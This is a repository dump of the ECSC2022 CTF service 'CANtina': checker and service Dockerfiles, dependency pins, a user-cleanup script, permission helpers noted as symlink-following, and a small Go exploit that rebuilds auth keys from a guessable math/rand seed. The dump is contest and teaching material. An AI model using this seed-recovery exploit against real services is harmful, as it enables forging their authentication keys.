    return passwd.pw_uid


@lru_cache
def get_gid(name: str) -> int:
    """Return the numeric group id of group *name* from the group database.

    Memoized like :func:`get_uid`. ``grp.getgrnam`` raises ``KeyError`` for
    an unknown group.
    """
    group = grp.getgrnam(name)
    return group.gr_gid


def set_perms(path, owner: str, group: str, mode: int) -> None:
    """Set the owner and group of *path*, then set its permission bits.

    Both ``os.chown`` and ``os.chmod`` follow symbolic links by default, so
    the change lands on whatever *path* resolves to at call time.
    NOTE(review): if *path* can live in a directory that less-trusted users
    may write to, verify callers cannot be handed a symlink here.
    """
    uid = get_uid(owner)
    gid = get_gid(group)
    # Ownership first, mode last, so the mode passed in is the final state
    # (chown can clear set-id bits on Linux).
    os.chown(path, uid, gid)
    os.chmod(path, mode)


def set_perms_server(path) -> None:
    """Hand *path* to the server account: 0o770 for a directory, else 0o660.

    ``os.path.isdir`` follows symlinks and runs before the chown/chmod, so
    the type check and the permission change are separate steps on the same
    name.
    """
    mode = 0o770 if os.path.isdir(path) else 0o660
    set_perms(path, USER_SERVER, USER_SERVER, mode)
-------------------------------------------------------------------------------- /cantina/cantina.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/cantina.png -------------------------------------------------------------------------------- /cantina/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | # Add requirements 7 | COPY checker1/requirements.txt /checker/requirements.txt 8 | RUN pip install -r
requirements.txt 9 | 10 | # Add common cantina files/modules 11 | COPY common/cantina/cantina /checker/cantina 12 | COPY common/cantinautils /checker/cantinautils 13 | COPY common/message-ids.yaml /conf/message-ids.yaml 14 | 15 | # Add checker 16 | COPY checker1/checker.py /checker/checker.py 17 | USER ctf-checkermaster 18 | ENV CTF_CHECKERSCRIPT /checker/checker.py 19 | 20 | # set this to _checker 21 | ENV CTF_SERVICE cantina_checker1 22 | -------------------------------------------------------------------------------- /cantina/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /cantina/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: 9 | context: .. 
10 | dockerfile: checker1/Dockerfile 11 | command: localhost 1 ${TICK} # ip, team, tick 12 | network_mode: "host" 13 | volumes: 14 | - checkerstate:/tmp 15 | -------------------------------------------------------------------------------- /cantina/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | certifi==2022.6.15.1 3 | cffi==1.15.1 4 | charset-normalizer==2.1.1 5 | cryptography==37.0.4 6 | h11==0.12.0 7 | httpcore==0.15.0 8 | httpx==0.23.0 9 | idna==3.3 10 | janus==1.0.0 11 | msgpack==1.0.4 12 | packaging==21.3 13 | pycparser==2.21 14 | pyparsing==3.0.9 15 | python-can==4.0.0 16 | PyYAML==6.0 17 | requests==2.28.1 18 | rfc3986==1.5.0 19 | sniffio==1.3.0 20 | typing_extensions==4.3.0 21 | urllib3==1.26.12 22 | wrapt==1.14.1 23 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/checkers/checker2/.gitkeep -------------------------------------------------------------------------------- /cantina/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | # Add requirements 7 | COPY checker2/requirements.txt /checker/requirements.txt 8 | RUN pip install -r requirements.txt 9 | 10 | # Add common cantina files/modules 11 | COPY checker2/music /checker/music 12 | COPY common/cantina/cantina /checker/cantina 13 | COPY common/cantinautils /checker/cantinautils 14 | COPY checker2/vgm /checker/vgm 15 | COPY common/message-ids.yaml /conf/message-ids.yaml 16 | 17 | # Add checker 18 | COPY checker2/checker.py /checker/checker.py 19 | USER ctf-checkermaster 20 | ENV CTF_CHECKERSCRIPT 
/checker/checker.py 21 | 22 | # set this to _checker 23 | ENV CTF_SERVICE cantina_checker2 24 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker2`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: 9 | context: .. 
10 | dockerfile: checker2/Dockerfile 11 | command: localhost 1 ${TICK} # ip, team, tick 12 | network_mode: "host" 13 | volumes: 14 | - checkerstate:/tmp 15 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/music/cantina.vgm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/checkers/checker2/music/cantina.vgm -------------------------------------------------------------------------------- /cantina/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | certifi==2022.6.15.1 3 | cffi==1.15.1 4 | charset-normalizer==2.1.1 5 | cryptography==37.0.4 6 | h11==0.12.0 7 | httpcore==0.15.0 8 | httpx==0.23.0 9 | idna==3.3 10 | janus==1.0.0 11 | msgpack==1.0.4 12 | packaging==21.3 13 | pycparser==2.21 14 | pyparsing==3.0.9 15 | python-can==4.0.0 16 | PyYAML==6.0 17 | requests==2.28.1 18 | rfc3986==1.5.0 19 | sniffio==1.3.0 20 | typing_extensions==4.3.0 21 | urllib3==1.26.12 22 | wrapt==1.14.1 23 | kaitaistruct 24 | -------------------------------------------------------------------------------- /cantina/checkers/checker2/vgm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/checkers/checker2/vgm/__init__.py -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/.gitignore: -------------------------------------------------------------------------------- 1 | *.egg-info/ 2 | __pycache__ 3 | build/ 4 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/__init__.py: 
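-------------------------------------------------------------------------------- 1 | from .cipher import Cipher 2 | from . import kex 3 | from . import canopy 4 | from . import powcheck 5 | from . import tocan 6 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/canopy/.dockerignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/canopy/__init__.py: -------------------------------------------------------------------------------- 1 | from .server import Server 2 | from .client import Client 3 | from .fields import Session 4 | 5 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/kex/__init__.py: -------------------------------------------------------------------------------- 1 | from .key_exchange import KeyExchange 2 | from .exchange_server import KeyExchangeServer 3 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/tocan/__init__.py: -------------------------------------------------------------------------------- 1 | from .tocan import ToCanClient, pack_can_message 2 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/cantina/tocan/gateway.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | if __name__ == "__main__": 13 | 14 | 15 | -------------------------------------------------------------------------------- /cantina/checkers/common/cantina/setup.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# Packaging metadata for the code shared by the CANtina components.
#
# NOTE(review): install_requires and python_requires are setuptools keywords.
# Plain distutils reports them as unknown options and does not enforce them,
# so the pins below only take effect when the build runs under setuptools
# (presumably the case when installed through pip; confirm). distutils was
# also removed from the standard library in Python 3.12, which the '>=3.10'
# range below includes.
from distutils.core import setup

setup(
    name='CANtina Common Library',
    version='0.1',
    description='Common code required across CANtina components',
    packages=['cantina', 'cantina.canopy', 'cantina.kex', 'cantina.powcheck', 'cantina.tocan'],
    install_requires=[
        'cryptography == 37.0.4',
        'msgpack == 1.0.4',
        'python-can == 4.0.0',
        # NOTE(review): the only dependency here without a version pin.
        'janus'
    ],
    # Keyword spelled 'python_requires' so the interpreter-version constraint
    # is recognised instead of being dropped as an unknown option.
    python_requires='>=3.10'
)
-------------------------------------------------------------------------------- /cantina/dist/gateway/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./gateway /app/gateway 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | EXPOSE 10020 15 | 16 | CMD ["/app/gateway"] 17 | -------------------------------------------------------------------------------- /cantina/dist/gateway/gateway: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/gateway/gateway -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY .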
/app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | EXPOSE 10024 22 | 23 | CMD /app/run.sh 24 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | Authlib==1.0.1 3 | certifi==2022.6.15.1 4 | cffi==1.15.1 5 | click==8.1.3 6 | cryptography==38.0.1 7 | h11==0.12.0 8 | httpcore==0.15.0 9 | httpx==0.23.0 10 | idna==3.3 11 | itsdangerous==2.1.2 12 | Jinja2==3.1.2 13 | kaitaistruct==0.10 14 | MarkupSafe==2.1.1 15 | pycparser==2.21 16 | python-multipart==0.0.5 17 | PyYAML==6.0 18 | rfc3986==1.5.0 19 | six==1.16.0 20 | sniffio==1.3.0 21 | starlette==0.20.4 22 | starlette-authlib==0.1.12 23 | uvicorn==0.18.3 24 | aiosqlite 25 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10024 4 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS files ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL, 5 | track TEXT NOT NULL, 6 | game TEXT NOT NULL, 7 | author TEXT NOT NULL, 8 | filename TEXT NOT NULL 9 | ); 10 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/assets/jukebox.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-front/static/assets/jukebox.jpg 
-------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .top-nav { 2 | padding: var(--spacing); 3 | border-bottom: 1px solid #343434; 4 | background-color: #11191f; 5 | position: fixed; 6 | top: 0; 7 | left: 0; 8 | right: 0; 9 | width: 100%; 10 | z-index: 9999; 11 | } 12 | 13 | .menu-item-image { 14 | text-align: center; 15 | } 16 | 17 | #app { 18 | margin-top: 5rem; 19 | } 20 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | CANtina: Jukebox 9 | 10 | 11 | 13 | 14 |
15 |
16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/nav/AbstractNav.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_info) { 3 | this.user_info = user_info; 4 | } 5 | 6 | async getHtml() { 7 | return ` 8 | 11 | `; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/nav/Auth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 17 | `; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/nav/UnAuth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 16 | `; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-front/static/js/views/AbstractView.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_data) { 3 | this.user_data = user_data; 4 | } 5 | 6 | setTitle(title) { 7 | document.title = title; 8 | } 9 | 10 | async registerEventHandlers() { 11 | } 12 | 13 | async getHtml() { 14 | return ""; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- 
/cantina/dist/jukebox-front/vgm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-front/vgm/__init__.py -------------------------------------------------------------------------------- /cantina/dist/jukebox-proxy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./jukebox-proxy /app/jukebox 8 | COPY ./static /app/static 9 | 10 | RUN mkdir /data 11 | RUN chown -R cantina:cantina /data 12 | RUN chown -R cantina:cantina /app 13 | 14 | USER cantina 15 | EXPOSE 10025 16 | 17 | CMD ["/app/jukebox"] 18 | -------------------------------------------------------------------------------- /cantina/dist/jukebox-proxy/jukebox-proxy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-proxy/jukebox-proxy -------------------------------------------------------------------------------- /cantina/dist/jukebox-proxy/static/cantina.vgm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/jukebox-proxy/static/cantina.vgm -------------------------------------------------------------------------------- /cantina/dist/keyserver/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./ksv /app/ksv 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | 15 | CMD 
["/app/ksv"] 16 | -------------------------------------------------------------------------------- /cantina/dist/keyserver/ksv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/keyserver/ksv -------------------------------------------------------------------------------- /cantina/dist/orderdb/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./odb /app/odb 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | CMD ["/app/odb"] 15 | -------------------------------------------------------------------------------- /cantina/dist/orderdb/odb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/orderdb/odb -------------------------------------------------------------------------------- /cantina/dist/pos/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./pos /app/pos 8 | COPY ./static /static 9 | COPY ./order-items.yaml /app 10 | 11 | RUN mkdir /data 12 | RUN chown -R cantina:cantina /data 13 | RUN chown -R cantina:cantina /app 14 | 15 | USER cantina 16 | EXPOSE 10021 17 | 18 | CMD ["/app/pos"] 19 | -------------------------------------------------------------------------------- /cantina/dist/pos/pos: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/pos 
-------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/cantina.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/cantina.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/bacon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/bacon.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/carbonara.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/carbonara.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/cheese.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/cheese.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/double.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/double.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/funghi.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/funghi.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/hawaii.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/hawaii.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/hawaii_lavish.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/hawaii_lavish.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/pomodoro.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/pomodoro.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/reaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/reaper.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/rigatoni.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/rigatoni.jpg 
-------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/special.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/special.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/tonno.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/tonno.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/assets/img/tortelloni.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/pos/static/assets/img/tortelloni.jpg -------------------------------------------------------------------------------- /cantina/dist/pos/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .top-nav { 2 | padding: var(--spacing); 3 | border-bottom: 1px solid #343434; 4 | background-color: #11191f; 5 | position: fixed; 6 | top: 0; 7 | left: 0; 8 | right: 0; 9 | width: 100%; 10 | z-index: 9999; 11 | } 12 | 13 | .menu-item-image { 14 | text-align: center; 15 | } 16 | 17 | #app { 18 | margin-top: 5rem; 19 | } 20 | 21 | code { 22 | display: block; 23 | white-space: pre-wrap; 24 | } 25 | -------------------------------------------------------------------------------- /cantina/dist/pos/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | CANtina 9 | 10 | 11 | 21 | 22 |
23 |
24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /cantina/dist/pos/static/js/views/AbstractView.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | setTitle(title) { 3 | document.title = title; 4 | } 5 | 6 | async getHtml() { 7 | return ""; 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY . 
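/app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | #CMD python main.py 22 | EXPOSE 10026 23 | 24 | CMD /app/run.sh 25 | 26 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/cleanup.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Background job that periodically purges old rows from the user database."""
import signal
import sqlite3
import os
from pathlib import Path
from threading import Event


def do_cleanup(data_dir: Path):
    """Delete users created 30 minutes ago or earlier from ``user.db``.

    Best effort: any failure is printed and swallowed so the calling loop
    keeps running.

    Args:
        data_dir: Directory that contains ``user.db``.
    """
    try:
        con = sqlite3.connect(data_dir / "user.db")
        try:
            # SQL string literals take single quotes. Double quotes denote
            # identifiers and are read as strings only through a SQLite
            # compatibility fallback that a build may disable.
            con.execute(
                "delete from users where created <= datetime('now', '-30 minute')"
            )
            con.commit()
        finally:
            # Close even when execute/commit raises, so a failing run does
            # not leave the connection open until garbage collection.
            con.close()
    except Exception as ex:
        print(f'Got {ex}, continuing')


if __name__ == '__main__':
    stop = Event()

    def _request_stop(_signum, _frame):
        """Signal handler: ask the loop below to finish."""
        stop.set()

    for sig in (signal.SIGTERM, signal.SIGHUP, signal.SIGINT):
        signal.signal(sig, _request_stop)

    data_dir = Path(os.environ.get("DATA_DIR", "/data"))

    # One cleanup pass every 120 seconds; Event.wait returns early once a
    # stop has been requested, so shutdown does not wait out the interval.
    while not stop.is_set():
        do_cleanup(data_dir)
        stop.wait(120)
-------------------------------------------------------------------------------- /cantina/dist/userdb-back/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | click==8.1.3 3 | fastapi==0.83.0 4 | h11==0.13.0 5 | idna==3.3 6 | pydantic==1.10.2 7 | PyYAML==6.0 8 | sniffio==1.3.0 9 | starlette==0.19.1 10 | typing_extensions==4.3.0 11 | uvicorn==0.18.3 12 | cryptography 13 | msgpack 14 | -------------------------------------------------------------------------------- /cantina/dist/userdb-back/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10026 4 | --------------------------------------------------------------------------------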
/cantina/dist/userdb-back/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS users ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL UNIQUE, 5 | authtoken TEXT NOT NULL 6 | ); 7 | -------------------------------------------------------------------------------- /cantina/dist/userdb-proxy/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.16 2 | 3 | RUN addgroup -S cantina && adduser -S cantina -G cantina 4 | 5 | WORKDIR /app 6 | 7 | COPY ./userdb-proxy /app/udb 8 | 9 | RUN mkdir /data 10 | RUN chown -R cantina:cantina /data 11 | RUN chown -R cantina:cantina /app 12 | 13 | USER cantina 14 | 15 | CMD ["/app/udb"] 16 | -------------------------------------------------------------------------------- /cantina/dist/userdb-proxy/userdb-proxy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/dist/userdb-proxy/userdb-proxy -------------------------------------------------------------------------------- /cantina/exploits/.gitignore: -------------------------------------------------------------------------------- 1 | venv/ 2 | __pycache__/ 3 | -------------------------------------------------------------------------------- /cantina/exploits/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/exploits/.gitkeep -------------------------------------------------------------------------------- /cantina/exploits/go-randgen/exploit-rand: -------------------------------------------------------------------------------- 
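https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/exploits/go-randgen/exploit-rand -------------------------------------------------------------------------------- /cantina/exploits/go-randgen/go.mod: -------------------------------------------------------------------------------- 1 | module exploit-rand 2 | 3 | go 1.19 4 | -------------------------------------------------------------------------------- /cantina/exploits/go-randgen/rand.go: --------------------------------------------------------------------------------
package main

import (
	"encoding/base64"
	"fmt"
	"math/rand"
	"os"
	"strconv"
)

// main prints the base64 encoding of the first 32 bytes that math/rand
// produces for the integer seed given as the first command-line argument.
//
// math/rand is a deterministic generator: the same seed always yields the
// same byte stream, so a 32-byte key drawn from it is only as secret as the
// seed. Key material has to come from crypto/rand instead.
func main() {
	if len(os.Args) < 2 {
		fmt.Fprintln(os.Stderr, "usage: exploit-rand <seed>")
		os.Exit(1)
	}

	seedArg, err := strconv.Atoi(os.Args[1])
	if err != nil {
		// Atoi returns 0 on failure, so without this check a malformed
		// argument would silently be treated as seed 0.
		fmt.Fprintln(os.Stderr, "seed must be an integer:", err)
		os.Exit(1)
	}

	rng := rand.New(rand.NewSource(int64(seedArg)))

	var authKey [32]byte
	rng.Read(authKey[:])
	fmt.Println(base64.StdEncoding.EncodeToString(authKey[:]))
}
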